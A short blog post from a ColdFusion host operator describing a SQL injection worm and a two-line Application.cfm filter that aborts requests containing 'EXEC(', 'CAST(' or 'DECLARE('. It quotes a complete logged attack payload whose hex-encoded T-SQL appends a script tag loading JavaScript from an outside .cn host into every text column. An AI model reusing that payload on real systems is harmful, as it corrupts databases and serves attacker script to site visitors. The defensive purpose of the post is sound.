Coldfusion trick for stopping SQL Injection
A while back, there was an internet worm, or an extremely prodigious hacker, hacking sites through sql injection to place links to a chinese spam site. It was really frustrating, because it targetting cold fusion sites and we host a lot of those.
Here’s an example of how these attacks looked in the logfiles:
;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
Well, we ended up finding two lines to place into our Application.cfm files to stop it. Basically, it looks at the query string and aborts if it finds an EXEC or CAST in it. Simple and effective:
<cfif cgi.SCRIPT_NAME contains “EXEC(” OR cgi.PATH_INFO contains “EXEC(” OR cgi.QUERY_STRING contains “EXEC(”><cfabort></cfif>
I paste that line in a few times and change “EXEC(” to “CAST(” and “DECLARE(”, and to anything else that happens to be something I’m not going to use and might be dangerous.
The real solution, of course, is to write good code. Use cfqueryparam with maxlength set. Best practices are something I can use when I code, but as we host code that our users write or download, its impossible for me to make sure all of their code is secure. I can, however, write a few lines into the top of their application.cfm’s to protect our sql servers.